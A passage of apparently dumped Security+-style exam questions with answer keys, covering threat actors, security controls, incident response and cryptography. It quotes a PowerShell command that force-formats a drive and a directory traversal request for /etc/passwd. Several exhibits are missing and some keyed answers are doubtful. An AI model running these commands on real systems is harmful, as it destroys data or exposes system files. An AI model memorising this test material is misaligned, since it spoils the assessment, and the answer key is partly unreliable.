Which of the following threat actors is most likely to be motivated by ideology?
A. Business competitor
B. Hacktivist
C. Criminal syndicate
D. Script kiddie
E. Disgruntled employee
Correct Answer: B

Question #580
A user would like to install software and features that are not available with a mobile device's default software. Which of the following would all
the user to install unauthorized software and enable new features?
A. SQLi
B. Cross-site scripting
C. Jailbreaking
D. Side loading
Correct Answer: C

Question #581
A user downloaded an extension for a browser and the user’s device later became infected. The analyst who is investigating the incident saw
various logs where the attacker was hiding activity by deleting data. The following was observed running:
New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C - FileSystemLabel "New"-FileSystem NTFS -
Full -Force -Confirm:$false |
Which of the following is the malware using to execute the attack?
A. PowerShell
B. Python
C. Bash
D. Macros
Correct Answer: A

Question #582
An organization recently acquired an ISO 27001 certification. Which of the following would most likely be considered a benefit of this
certification?
A. It allows for the sharing of digital forensics data across organizations.
B. It provides insurance in case of a data breach
C. It provides complimentary training and certification resources to IT security staff
D. It certifies the organization can work with foreign entities that require a security clearance
E. It assures customers that the organization meets security standards
Correct Answer: E

Question #583
A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:
http://comptia.org/../../../etc/passwd
Which of the following types of attacks is being attempted and how can it be mitigated?
A. XSS; implement a SIEM
B. CSRF; implement an IPS
C. Directory traversal; implement a WAF
D. SQL injection; implement an IDS
Correct Answer: C

Question #584
A security professional wants to enhance the protection of a critical environment that is used to store and manage a company's encryption keys.
The selected technology should be tamper resistant. Which of the following should the security professional implement to achieve the goal?
A. DLP
B. HSM
C. CA
D. FIM
Correct Answer: B

Question #585
Which of the following is the correct order of volatility from most to least volatile?
A. Memory, temporary filesystems, routing tables, disk, network storage
B. Cache memory, temporary filesystems, disk, archival media
C. Memory, disk temporary filesystems, cache, archival media
D. Cache, disk, temporary filesystems, network storage, archival media
Correct Answer: B

Question #586
A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the
management team. Which of the following best describes the threat actor in the CISO's report?
A. Insider threat
B. Hacktivist
C. Nation-state
D. Organized crime
Correct Answer: D

Question #587
Which of the following agreements defines response time, escalation points, and performance metrics?
A. BPA
B. MOA
C. NDA
D. SLA
Correct Answer: D

Question #588
A bakery has a secret recipe that it wants to protect. Which of the following objectives should be added to the company’s security awareness
training?
A. Insider threat detection
B. Risk analysis
C. Phishing awareness
D. Business continuity planning
Correct Answer: A

Question #589
Which of the following must be considered when designing a high-availability network? (Choose two.)
A. Ease of recovery
B. Ability to patch
C. Physical isolation
D. Responsiveness
E. Attack surface
F. Extensible authentication
Correct Answer: AD

Question #590
Which of the following strategies shifts risks that are not covered in an organization’s risk strategy?
A. Risk transference
B. Risk avoidance
C. Risk mitigation
D. Risk acceptance
Correct Answer: A

Question #591
A dynamic application vulnerability scan identified that code injection could be performed using a web form. Which of the following will be the
best remediation to prevent this vulnerability?
A. Implement input validations
B. Deploy MFA
C. Utilize a WAF
D. Configure HIPS
Correct Answer: A

Question #592
A security administrator needs a method to secure data in an environment that includes some form of checks so that the administrator can track
any changes. Which of the following should the administrator set up to achieve this goal?
A. SPF
B. GPO
C. NAC
D. FIM
Correct Answer: D

Question #593
An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to implement
mitigation techniques to prevent further spread. Which of the following is the best course of action for the analyst to take?
A. Apply a DLP solution
B. Implement network segmentation
C. Utilize email content filtering.
D. Isolate the infected attachment
Correct Answer: B

Question #594
Sales team members have been receiving threatening voicemail messages and have reported these incidents to the IT security team. Which of the
following would be MOST appropriate for the IT security team to analyze?
A. Access control
B. Syslog
C. Session Initiation Protocol traffic logs
D. Application logs
Correct Answer: C

Question #595
Which of the following can be used to calculate the total loss expected per year due to a threat targeting an asset?
A. EF x asset value
B. ALE / SLE
C. MTBF x impact
D. SLE x ARO
Correct Answer: D

Question #596
A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of the following solutions should the engineer
implement FIRST? (Choose two.)
A. Auto-update
B. HTTP headers
C. Secure cookies
D. Third-party updates
E. Full disk encryption
F. Sandboxing
G. Hardware encryption
Correct Answer: AF

Question #597
Which of the following authentication methods is considered to be the LEAST secure?
A. TOTP
B. SMS
C. HOTP
D. Token key
Correct Answer: B

Question #598
Employees in the research and development business unit receive extensive training to ensure they understand how to best protect company data.
Which of the following is the type of data these employees are most likely to use in day to-day work activities?
A. Encrypted
B. Intellectual property
C. Critical
D. Data in transit
Correct Answer: C

Question #599
An audit report indicates multiple suspicious attempts to access company resources were made. These attempts were not detected by the
company. Which of the following would be the best solution to implement on the company's network?
A. Intrusion prevention system
B. Proxy server
C. Jump server
D. Security zones
Correct Answer: A

Question #600
An administrator identifies some locations on the third floor of the building that have a poor wireless signal Multiple users confirm the incident
and report it is not an isolated event. Which of the following should the administrator use to find the areas with a poor or non-existent wireless
signal?
A. Heat map
B. Input validation
C. Site survey
D. Embedded systems
Correct Answer: C

Question #601
Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal
IP addresses?
A. Compensating control
B. Network segmentation
C. Transfer of risk
D. SNMP traps
Correct Answer: A

Question #602
An attacker tricks a user into providing confidential information. Which of the following describes this form of malicious reconnaissance?
A. Phishing
B. Social engineering
C. Typosquatting
D. Smishing
Correct Answer: B

Question #603
A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each
location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional under-voltage events
that could last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the best solution to
reduce the risk of data loss?
A. Dual supply
B. Generator
C. PDU
D. Daily backups
Correct Answer: B

Question #604
Which of the following examples would be best mitigated by input sanitization?
A.
B. nmap -p- 10.11.1.130
C. Email message: “Click this link to get your free gift card.”
D. Browser message: “Your connection is not private.”
Correct Answer: A

Question #605
An organization would like to store customer data on a separate part of the network that is not accessible to users on the mam corporate
network. Which of the following should the administrator use to accomplish this goal?
A. Segmentation
B. Isolation
C. Patching
D. Encryption
Correct Answer: A

Question #606
A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the
following vulnerabilities is the organization addressing?
A. Cross-site scripting
B. Buffer overflow
C. Jailbreaking
D. Side loading
Correct Answer: C

Question #607
A company is expanding its threat surface program and allowing individuals to security test the company's internet-facing application. The
company will compensate researchers based on the vulnerabilities discovered. Which of the following best describes the program the company is
setting up?
A. Open-source intelligence
B. Bug bounty
C. Red team
D. Penetration testing
Correct Answer: B

Question #608
An organization experiences a cybersecurity incident involving a command-and-control server. Which of the following logs should be analyzed to
identify the impacted host? (Choose two.)
A. Application
B. Authentication
C. Error
D. Network
E. Firewall
F. System
Correct Answer: DE

Question #609
An administrator assists the legal and compliance team with ensuring information about customer transactions is archived for the proper time
period. Which of the following data policies is the administrator carrying out?
A. Compromise
B. Retention
C. Analysis
D. Transfer
E. Inventory
Correct Answer: B

Question #610
Which of the following are the MOST likely vectors for the unauthorized or unintentional inclusion of vulnerable code in a software company's final
software releases? (Choose two.)
A. Unsecure protocols
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software
Correct Answer: DE

Question #611
An organization has a growing workforce that is mostly driven by additions to the sales department. Each newly hired salesperson relies on a
mobile device to conduct business. The Chief Information Officer (CIO) is wondering if the organization may need to scale down just as quickly as
it scaled up. The CIO is also concerned about the organization's security and customer privacy. Which of the following would be BEST to address
the CIO's concerns?
A. Disallow new hires from using mobile devices for six months.
B. Select four devices for the sales department to use in a CYOD model.
C. Implement BYOD for the sales department while leveraging the MDM.
D. Deploy mobile devices using the COPE methodology.
Correct Answer: C

Question #612
A company has limited storage space available and an online presence that cannot be down for more than four hours. Which of the following
backup methodologies should the company implement to allow for the FASTEST database restore time in the event of a failure, while being
mindful of the limited available storage space?
A. Implement full tape backups every Sunday at 8:00 p.m. and perform nightly tape rotations.
B. Implement differential backups every Sunday at 8:00 p.m. and nightly incremental backups at 8:00 p.m.
C. Implement nightly full backups every Sunday at 8:00 p.m.
D. Implement full backups every Sunday at 8:00 p.m. and nightly differential backups at 8:00 p.m.
Correct Answer: D

Question #613
A startup company is using multiple SaaS and IaaS platforms to stand up a corporate infrastructure and build out a customer-facing web
application. Which of the following solutions would be BEST to provide security, manageability, and visibility into the platforms?
A. SIEM
B. DLP
C. CASB
D. SWG
Correct Answer: C

Question #614
Which of the following technical controls is BEST suited for the detection and prevention of buffer overflows on hosts?
A. DLP
B. HIDS
C. EDR
D. NIPS
Correct Answer: C

Question #615
A consultant is configuring a vulnerability scanner for a large, global organization in multiple countries. The consultant will be using a service
account to scan systems with administrative privileges on a weekly basis, but there is a concern that hackers could gain access to the account
and pivot throughout the global network. Which of the following would be BEST to help mitigate this concern?
A. Create different accounts for each region, each configured with push MFA notifications.
B. Create one global administrator account and enforce Kerberos authentication.
C. Create different accounts for each region, limit their logon times, and alert on risky logins.
D. Create a guest account for each region, remember the last ten passwords, and block password reuse.
Correct Answer: C

Question #616
While troubleshooting a firewall configuration, a technician determines that a "deny any" policy should be added to the bottom of the ACL. The
technician updates the policy, but the new policy causes several company servers to become unreachable. Which of the following actions would
prevent this issue?
A. Documenting the new policy in a change request and submitting the request to change management
B. Testing the policy in a non-production environment before enabling the policy in the production network
C. Disabling any intrusion prevention signatures on the "deny any" policy prior to enabling the new policy
D. Including an “allow any" policy above the "deny any" policy
Correct Answer: A

Question #617
A network technician is installing a guest wireless network at a coffee shop. When a customer purchases an item, the password for the wireless
network is printed on the receipt so the customer can log in. Which of the following will the technician MOST likely configure to provide the
highest level of security with the least amount of overhead?
A. WPA-EAP
B. WEP-TKIP
C. WPA-PSK
D. WPS-PIN
Correct Answer: C

Question #618
Which of the following ISO standards is certified for privacy?
A. ISO 9001
B. ISO 27002
C. ISO 27701
D. ISO 31000
Correct Answer: C

Question #619
An organization suffered an outage, and a critical system took 90 minutes to come back online. Though there was no data loss during the outage,
the expectation was that the critical system would be available again within 60 minutes. Which of the following is the 60-minute expectation an
example of?
A. MTBF
B. RPO
C. MTTR
D. RTO
Correct Answer: D

Question #620
A security analyst needs to be proactive in understanding the types of attacks that could potentially target the company's executives. Which of the
following intelligence sources should the security analyst review?
A. Vulnerability feeds
B. Trusted automated exchange of indicator information
C. Structured threat information expression
D. Industry information-sharing and collaboration groups
Correct Answer: D

Question #621
An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has agreed to pay for
each vulnerability that is discovered. Which of the following BEST represents the type of testing that will occur?
A. Bug bounty
B. Black-box
C. Gray-box
D. White-box
E. Red-team
Correct Answer: A

Question #622
A security analyst needs to determine how an attacker was able to use User3 to gain a foothold within a company’s network. The company's
lockout policy requires that an account be locked out for a minimum of 15 minutes after three unsuccessful attempts. While reviewing the log
files, the analyst discovers the following:
Which of the following attacks MOST likely occurred?
A. Dictionary
B. Credential-stuffing
C. Password-spraying
D. Brute-force
Correct Answer: C

Question #623
Users have been issued smart cards that provide physical access to a building. The cards also contain tokens that can be used to access
information systems. Users can log in to any thin client located throughout the building and see the same desktop each time. Which of the
following technologies are being utilized to provide these capabilities? (Choose two.)
A. COPE
B. VDI
C. GPS
D. TOTP
E. RFID
F. BYOD
Correct Answer: BE

Question #624
A security engineer needs to implement an MDM solution that complies with the corporate mobile device policy. The policy states that in order for
mobile users to access corporate resources on their devices, the following requirements must be met:
• Mobile device OSs must be patched up to the latest release.
• A screen lock must be enabled (passcode or biometric).
• Corporate data must be removed if the device is reported lost or stolen.
Which of the following controls should the security engineer configure? (Choose two.)
A. Containerization
B. Storage segmentation
C. Posturing
D. Remote wipe
E. Full-device encryption
F. Geofencing
Correct Answer: CD

Question #625
A systems administrator needs to implement an access control scheme that will allow an object's access policy to be determined by its owner.
Which of the following access control schemes BEST fits the requirements?
A. Role-based access control
B. Discretionary access control
C. Mandatory access control
D. Attribute-based access control
Correct Answer: B

Question #626
Which of the following security concepts should an e-commerce organization apply for protection against erroneous purchases?
A. Privacy
B. Availability
C. Integrity
D. Confidentiality
Correct Answer: C

Question #627
A network administrator needs to build out a new datacenter, with a focus on resiliency and uptime. Which of the following would BEST meet this
objective? (Choose two.)
A. Dual power supply
B. Off-site backups
C. Automatic OS upgrades
D. NIC teaming
E. Scheduled penetration testing
F. Network-attached storage
Correct Answer: AD

Question #628
A company's Chief Information Officer (CIO) is meeting with the Chief Information Security Officer (CISO) to plan some activities to enhance the
skill levels of the company's developers. Which of the following would be MOST suitable for training the developers?
A. A capture-the-flag competition
B. A phishing simulation
C. Physical security training
D. Basic awareness training
Correct Answer: A

Question #629
A cybersecurity administrator has a reduced team and needs to operate an on-premises network and security infrastructure efficiently. To help
with the situation, the administrator decides to hire a service provider. Which of the following should the administrator use?
A. SDP
B. AAA
C. IaaS
D. MSSP
E. Microservices
Correct Answer: D

Question #630
Which of the following threat vectors would appear to be the most legitimate when used by a malicious actor to impersonate a company?
A. Phone call
B. Instant message
C. Email
D. Text message
Correct Answer: C

Question #631
The SOC is reviewing processes and procedures after a recent incident. The review indicates it took more than 30 minutes to determine that
quarantining an infected host was the best course of action. This allowed the malware to spread to additional hosts before it was contained.
Which of the following would be BEST to improve the incident response process?
A. Updating the playbooks with better decision points
B. Dividing the network into trusted and untrusted zones
C. Providing additional end-user training on acceptable use
D. Implementing manual quarantining of infected hosts
Correct Answer: A

Question #632
A security administrator checks the table of a network switch, which shows the following output:
Which of the following is happening to this switch?
A. MAC flooding
B. DNS poisoning
C. MAC cloning
D. ARP poisoning
Correct Answer: A

Question #633
An organization just experienced a major cyberattack incident. The attack was well coordinated, sophisticated, and highly skilled. Which of the
following targeted the organization?
A. Shadow IT
B. An insider threat
C. A hacktivist
D. An advanced persistent threat
Correct Answer: D

Question #634
A smart switch has the ability to monitor electrical levels and shut off power to a building in the event of power surge or other fault situation. The
switch was installed on a wired network in a hospital and is monitored by the facilities department via a cloud application. The security
administrator isolated the switch on a separate VLAN and set up a patching routine. Which of the following steps should also be taken to harden
the smart switch?
A. Set up an air gap for the switch.
B. Change the default password for the switch
C. Place the switch in a Faraday cage.
D. Install a cable lock on the switch.
Correct Answer: B

Question #635
A company recently set up an e-commerce portal to sell its products online. The company wants to start accepting credit cards for payment,
which requires compliance with a security standard. Which of the following standards must the company comply with before accepting credit
cards on its e-commerce platform?
A. PCI DSS
B. ISO 22301
C. ISO 27001
D. NIST CSF
Correct Answer: A

Question #636
A security analyst is investigating an incident that was first reported as an issue connecting to network shares and the Internet. While reviewing
logs and tool output, the analyst sees the following:
Which of the following attacks has occurred?
A. IP conflict
B. Pass-the-hash
C. MAC flooding
D. Directory traversal
E. ARP poisoning
Correct Answer: E

Question #637
Which of the following allows for functional test data to be used in new systems for testing and training purposes to protect the real data?
A. Data encryption
B. Data masking
C. Data deduplication
D. Data minimization
Correct Answer: B

Question #638
A company recently moved sensitive videos between on-premises, company-owned websites. The company then learned the videos had been
uploaded and shared to the Internet. Which of the following would MOST likely allow the company to find the cause?
A. Checksums
B. Watermarks
C. Order of volatility
D. A log analysis
E. A right-to-audit clause
Correct Answer: D

Question #639
A public relations team will be taking a group of guests on a tour through the facility of a large e- commerce company. The day before the tour, the
company sends out an email to employees to ensure all whiteboards are cleaned and all desks are cleared. The company is MOST likely trying to
protect against:
A. loss of proprietary information.
B. damage to the company's reputation.
C. social engineering.
D. credential exposure.
Correct Answer: A

Question #640
Which of the following BEST explains the reason why a server administrator would place a document named password.txt on the desktop of an
administrator account on a server?
A. The document is a honeyfile and is meant to attract the attention of a cyberintruder.
B. The document is a backup file if the system needs to be recovered.
C. The document is a standard file that the OS needs to verify the login credentials.
D. The document is a keylogger that stores all keystrokes should the account be compromised.
Correct Answer: A

Question #641
A security analyst needs to generate a server certificate to be used for 802.1X and secure RDP connections. The analyst is unsure what is required
to perform the task and solicits help from a senior colleague. Which of the following is the FIRST step the senior colleague will most likely tell the
analyst to perform to accomplish this task?
A. Create an OCSP
.
B. Generate a CSR.
C. Create a CRL.
D. Generate a .pfx file.
Correct Answer: B

Question #642
When selecting a technical solution for identity management, an architect chooses to go from an in-house solution to a third-party SaaS provider.
Which of the following risk management strategies is this an example of?
A. Acceptance
B. Mitigation
C. Avoidance
D. Transference
Correct Answer: D

Question #643
Which of the following describes the BEST approach for deploying application patches?
A. Apply the patches to systems in a testing environment, then to systems in a staging environment, and finally to production systems.
B. Test the patches in a staging environment, develop against them in the development environment, and then apply them to the production
systems.
C. Test the patches in a test environment, apply them to the production systems, and then apply them to a staging environment.
D. Apply the patches to the production systems, apply them in a staging environment, and then test all of them in a testing environment.
Correct Answer: A

Question #644
A small business just recovered from a ransomware attack against its file servers by purchasing the decryption keys from the attackers. The issue
was triggered by a phishing email and the IT administrator wants to ensure it does not happen again. Which of the following should the IT
administrator do FIRST after recovery?
A. Scan the NAS for residual or dormant malware and take new daily backups that are tested on a frequent basis.
B. Restrict administrative privileges and patch all systems and applications.
C. Rebuild all workstations and install new antivirus software.
D. Implement application whitelisting and perform user application hardening.
Correct Answer: A

Question #645
After entering a username and password, an administrator must draw a gesture on a touch screen. Which of the following demonstrates what the
administrator is providing?
A. Multifactor authentication
B. Something you can do
C. Biometrics
D. Two-factor authentication
Correct Answer: B

Question #646
An analyst visits an Internet forum looking for information about a tool. The analyst finds a thread that appears to contain relevant information.
One of the posts says the following:
Which of the following BEST describes the attack that was attempted against the forum readers?
A. SQLi attack
B. DLL attack
C. XSS attack
D. API attack
Correct Answer: C

Question #647
A root cause analysis reveals that a web application outage was caused by one of the company's developers uploading a newer version of the
third-party libraries that were shared among several applications. Which of the following implementations would be BEST to prevent this issue
from reoccurring?
A. CASB
B. SWG
C. Containerization
D. Automated failover
Correct Answer: C

Question #648
The Chief Security Officer (CSO) at a major hospital wants to implement SSO to help improve security in the environment and protect patient data,
particularly at shared terminals. The Chief Risk Officer (CRO) is concerned that training and guidance have not been provided to frontline staff, and
a risk analysis has not been performed. Which of the following is the MOST likely cause of the CRO's concerns?
A. SSO would simplify username and password management, making it easier for hackers to guess accounts.
B. SSO would reduce password fatigue, but staff would still need to remember more complex passwords.
C. SSO would reduce the password complexity for frontline staff.
D. SSO would reduce the resilience and availability of systems if the identity provider goes offline.
Correct Answer: A

Question #649
A software developer needs to perform code-execution testing, black-box testing, and non- functional testing on a new product before its general
release. Which of the following BEST describes the tasks the developer is conducting?
A. Verification
B. Validation
C. Normalization
D. Staging
Correct Answer: B

Question #650
Joe, a user at a company, clicked an email link that led to a website that infected his workstation. Joe was connected to the network, and the virus
spread to the network shares. The protective measures failed to stop this virus, and it has continued to evade detection. Which of the following
should a security administrator implement to protect the environment from this malware?
A. Install a definition-based antivirus.
B. Implement an IDS/IPS.
C. Implement a heuristic behavior-detection solution.
D. Implement CASB to protect the network shares.
Correct Answer: C

Question #651
A security engineer is reviewing log files after a third party discovered usernames and passwords for the organization's accounts. The engineer
sees there was a change in the IP address for a vendor website one week earlier. This change lasted eight hours. Which of the following attacks
was MOST likely used?
A. Man-in-the-middle
B. Spear-phishing
C. Evil twin
D. DNS poisoning
Correct Answer: D

Question #652
A user recently entered a username and password into a recruiting application website that had been forged to look like the legitimate site. Upon
investigation, a security analyst identifies the following:
• The legitimate website's IP address is 10.1.1.20 and eRecruit.local resolves to this IP
.
• The forged website's IP address appears to be 10.2.12.99, based on NetFlow records.
• All three of the organization's DNS servers show the website correctly resolves to the legitimate IP
.
• DNS query logs show one of the three DNS servers returned a result of 10.2.12.99 (cached) at the approximate time of the suspected
compromise.
Which of the following MOST likely occurred?
A. A reverse proxy was used to redirect network traffic.
B. An SSL strip MITM attack was performed.
C. An attacker temporarily poisoned a name server.
D. An ARP poisoning attack was successfully executed.
Correct Answer: C

Question #653
A recent audit uncovered a key finding regarding the use of a specific encryption standard in a web application that is used to communicate with
business customers. Due to the technical limitations of its customers, the company is unable to upgrade the encryption standard. Which of the
following types of controls should be used to reduce the risk created by this scenario?
A. Physical
B. Detective
C. Preventive
D. Compensating
Correct Answer: D

Question #654
Which of the following is a team of people dedicated to testing the effectiveness of organizational security programs by emulating the techniques
of potential attackers?
A. Red team
B. White team
C. Blue team
D. Purple team
Correct Answer: A

Question #655
A security assessment determines DES and 3DES are still being used on recently deployed production servers. Which of the following did the
assessment identify?
A. Unsecure protocols
B. Default settings
C. Open permissions
D. Weak encryption
Correct Answer: D

Question #656
The cost of removable media and the security risks of transporting data have become too great for a laboratory. The laboratory has decided to
interconnect with partner laboratories to make data transfers easier and more secure. The Chief Security Officer (CSO) has several concerns about
proprietary data being exposed once the interconnections are established. Which of the following security features should the network
administrator implement to prevent unwanted data exposure to users in partner laboratories?
A. VLAN zoning with a file-transfer server in an external-facing zone
B. DLP running on hosts to prevent file transfers between networks
C. NAC that permits only data-transfer agents to move data between networks
D. VPN with full tunneling and NAS authenticating through the Active Directory
Correct Answer: D

Question #657
A vulnerability assessment report will include the CVSS score of the discovered vulnerabilities because the score allows the organization to
better:
A. validate the vulnerability exists in the organization's network through penetration testing.
B. research the appropriate mitigation techniques in a vulnerability database.
C. find the software patches that are required to mitigate a vulnerability.
D. prioritize remediation of vulnerabilities based on the possible impact.
Correct Answer: D

Question #658
A security analyst is performing a forensic investigation involving compromised account credentials. Using the Event Viewer, the analyst was able
to detect the following message: "Special privileges assigned to new logon." Several of these messages did not have a valid logon associated with
the user before these privileges were assigned. Which of the following attacks is MOST likely being detected?
A. Pass-the-hash
B. Buffer overflow
C. Cross-site scripting
D. Session replay
Correct Answer: A

Question #659
Company engineers regularly participate in a public Internet forum with other engineers throughout the industry. Which of the following tactics
would an attacker MOST likely use in this scenario?
A. Watering-hole attack
B. Credential harvesting
C. Hybrid warfare
D. Pharming
Correct Answer: A

Question #660
As company uses wireless for all laptops and keeps a very detailed record of its assets, along with a comprehensive list of devices that are
authorized to be on the wireless network. The Chief Information Officer (CIO) is concerned about a script kiddie potentially using an unauthorized
device to brute force the wireless PSK and obtain access to the internal network. Which of the following should the company implement to BEST
prevent this from occurring?
A. A BPDU guard
B. WPA-EAP
C. IP filtering
D. A WIDS
Correct Answer: B

Question #661
In the middle of a cyberattack, a security engineer removes the infected devices from the network and locks down all compromised accounts. In
which of the following incident response phases is the security engineer currently operating?
A. Identification
B. Preparation
C. Lessons learned
D. Eradication
E. Recovery
F. Containment
Correct Answer: F

Question #662
A network administrator would like to configure a site-to-site VPN utilizing IPSec. The administrator wants the tunnel to be established with data
integrity, encryption, authentication, and anti-replay functions. Which of the following should the administrator use when configuring the VPN?
A. AH
B. EDR
C. ESP
D. DNSSEC
Correct Answer: C

Question #663
A security incident may have occurred on the desktop PC of an organization's Chief Executive Officer (CEO). A duplicate copy of the CEO's hard
drive must be stored securely to ensure appropriate forensic processes and the chain of custody are followed. Which of the following should be
performed to accomplish this task?
A. Install a new hard drive in the CEO's PC, and then remove the old hard drive and place it in a tamper-evident bag.
B. Connect a write blocker to the hard drive. Then, leveraging a forensic workstation, utilize the dd command in a live Linux environment to
create a duplicate copy.
C. Remove the CEO's hard drive from the PC, connect to the forensic workstation, and copy all the contents onto a remote fileshare while the
CEO watches.
D. Refrain from completing a forensic analysis of the CEO's hard drive until after the incident is confirmed; duplicating the hard drive at this
stage could destroy evidence.
Correct Answer: B

Question #664
A security engineer at an offline government facility is concerned about the validity of an SSL certificate. The engineer wants to perform the
fastest check with the least delay to determine if the certificate has been revoked. Which of the following would BEST meet these requirements?
A. RA
B. OCSP
C. CRL
D. CSR
Correct Answer: C

Question #665
A security administrator needs to create a RAID configuration that is focused on high read speeds and fault tolerance. It is unlikely that multiple
drives will fail simultaneously. Which of the following RAID configurations should the administrator use?
A. RAID 0
B. RAID 1
C. RAID 5
D. RAID 10
Correct Answer: D

Question #666
Which of the following algorithms has the SMALLEST key size?
A. DES
B. Twofish
C. RSA
D. AES
Correct Answer: A

Question #667
During an incident response, a security analyst observes the following log entry on the web server:
Which of the following BEST describes the type of attack the analyst is experiencing?
A. SQL injection
B. Cross-site scripting
C. Pass-the-hash
D. Directory traversal
Correct Answer: D

Question #668
A security audit has revealed that a process control terminal is vulnerable to malicious users installing and executing software on the system. The
terminal is beyond end-of-life support and cannot be upgraded, so it is placed on a protected network segment. Which of the following would be
MOST effective to implement to further mitigate the reported vulnerability?
A. DNS sinkholing
B. DLP rules on the terminal
C. An IP blacklist
D. Application whitelisting
Correct Answer: D

Question #669
A document that appears to be malicious has been discovered in an email that was sent to a company's Chief Financial Officer (CFO). Which of
the following would be BEST to allow a security analyst to gather information and confirm it is a malicious document without executing any code it
may contain?
A. Open the document on an air-gapped network.
B. View the document's metadata for origin clues.
C. Search for matching file hashes on malware websites.
D. Detonate the document in an analysis sandbox.
Correct Answer: C

Question #670
A security analyst has received an alert about PII being sent via email. The analyst's Chief Information Security Officer (CISO) has made it clear
that PII must be handled with extreme care. From which of the following did the alert MOST likely originate?
A. S/MIME
B. DLP
C. IMAP
D. HIDS
Correct Answer: B

Question #671
A company has drafted an insider-threat policy that prohibits the use of external storage devices. Which of the following would BEST protect the
company from data exfiltration via removable media?
A. Monitoring large data transfer transactions in the firewall logs
B. Developing mandatory training to educate employees about the removable media policy
C. Implementing a group policy to block user access to system files
D. Blocking removable-media devices and write capabilities using a host-based security tool
Correct Answer: D

Question #672
After a ransomware attack, a forensics company needs to review a cryptocurrency transaction between the victim and the attacker. Which of the
following will the company MOST likely review to trace this transaction?
A. The public ledger
B. The NetFlow data
C. A checksum
D. The event log
Correct Answer: A

Question #673
A network administrator is setting up wireless access points in all the conference rooms and wants to authenticate devices using PKI. Which of
the following should the administrator configure?
A. A captive portal
B. PSK
C. 802.1X
D. WPS
Correct Answer: C

Question #674
A security analyst is reviewing the following attack log output:
Which of the following types of attacks does this MOST likely represent?
A. Rainbow table
B. Brute-force
C. Password-spraying
D. Dictionary
Correct Answer: C

Question #675
An organization has hired a security analyst to perform a penetration test. The analyst captures 1Gb worth of inbound network traffic to the server
and transfers the pcap back to the machine for analysis. Which of the following tools should the analyst use to further review the pcap?
A. Nmap
B. cURL
C. Netcat
D. Wireshark
Correct Answer: D

Question #676
An organization that is located in a flood zone is MOST likely to document the concerns associated with the restoration of IT operations in a:
A. business continuity plan.
B. communications plan.
C. disaster recovery plan.
D. continuity of operations plan.
Correct Answer: C

Question #677
Which of the following should a security administrator adhere to when setting up a new set of firewall rules?
A. Disaster recovery plan
B. Incident response procedure
C. Business continuity plan
D. Change management procedure
Correct Answer: D

Question #678
During an engagement, penetration testers left USB keys that contained specially crafted malware in the company's parking lot. A couple days
later, the malware contacted the command-and-control server, giving the penetration testers unauthorized access to the company endpoints.
Which of the following will most likely be a recommendation in the engagement report?
A. Conduct an awareness campaign on the usage of removable media.
B. Issue a user guidance program focused on vishing campaigns.
C. Implement more complex password management practices.
D. Establish a procedure on identifying and reporting suspicious messages.
Correct Answer: A

Question #679
A company recently experienced a significant data loss when proprietary information was leaked to a competitor. The company took special
precautions by using proper labels; however, email filter logs do not have any record of the incident. An investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet and passed to the competitor via cloud storage.
Which of the following is the best mitigation strategy to prevent this from happening in the future?
A. User training
B. CASB
C. MDM
D. EDR
Correct Answer: C

Question #680
A manufacturing organization wants to control and monitor access from the internal business network to the segregated production network,
while ensuring minimal exposure of the production network to devices. Which of the following solutions would best accomplish this goal?
A. Proxy server
B. NGFW
C. WAF
D. Jump server
Correct Answer: D

Question #681
Which of the following roles, according to the shared responsibility model, is responsible for securing the company's database in an IaaS model
for a cloud environment?
A. Client
B. Third-party vendor
C. Cloud provider
D. OBA
Correct Answer: A

Question #682
Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's PII?
A. SCAP
B. NetFlow
C. Antivirus
D. DLP
Correct Answer: D

Question #683
A bank insists all of its vendors must prevent data loss on stolen laptops. Which of the following strategies is the bank requiring?
A. Encryption at rest
B. Masking
C. Data classification
D. Permission restrictions
Correct Answer: A

Question #684
After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate network. Which of the following is the most
appropriate to disable?
A. Console access
B. Routing protocols
C. VLANs
D. Web-based administration
Correct Answer: D

Question #685
A company requires hard drives to be securely wiped before sending decommissioned systems to recycling. Which of the following best describes
this policy?
A. Enumeration
B. Sanitization
C. Destruction
D. Inventory
Correct Answer: B

Question #686
An attacker posing as the Chief Executive Officer calls an employee and instructs the employee to buy gift cards. Which of the following
techniques is the attacker using?
A. Smishing
B. Phishing
C. Impersonating
D. Vishing
Correct Answer: D

Question #687
Which of the following is a cryptographic concept that operates on a fixed length of bits?
A. Block cipher
B. Hashing
C. Key stretching
D. Salting
Correct Answer: A

Question #688
Which of the following best describes a use case for a DNS sinkhole?
A. Attackers can see a DNS sinkhole as a highly valuable resource to identify a company's domain structure.
B. A DNS sinkhole can be used to draw employees away from known-good websites to malicious ones owned by the attacker.
C. A DNS sinkhole can be used to capture traffic to known-malicious domains used by attackers.
D. A DNS sinkhole can be set up to attract potential attackers away from a company's network resources.
Correct Answer: C

Question #689
Which of the following explains why an attacker cannot easily decrypt passwords using a rainbow table attack?
A. Digital signatures
B. Salting
C. Hashing
D. Perfect forward secrecy
Correct Answer: B

Question #690
A company reduced the area utilized in its data center by creating virtual networking through automation and by creating provisioning routes and
rules through scripting. Which of the following does this example describe?
A. IaC
B. MSSP
C. Containers
D. SaaS
Correct Answer: A

Question #691
Historically, a company has had issues with users plugging in personally owned removable media devices into corporate computers. As a result,
the threat of malware incidents is almost constant. Which of the following would best help prevent the malware from being installed on the
computers?
A. AUP
B. NGFW
C. DLP
D. EDR
Correct Answer: D

Question #692
While investigating a recent security breach, an analyst finds that an attacker gained access by SQL injection through a company website. Which
of the following should the analyst recommend to the website developers to prevent this from reoccurring?
A. Secure cookies
B. Input sanitization
C. Code signing
D. Blocklist
Correct Answer: B

Question #693
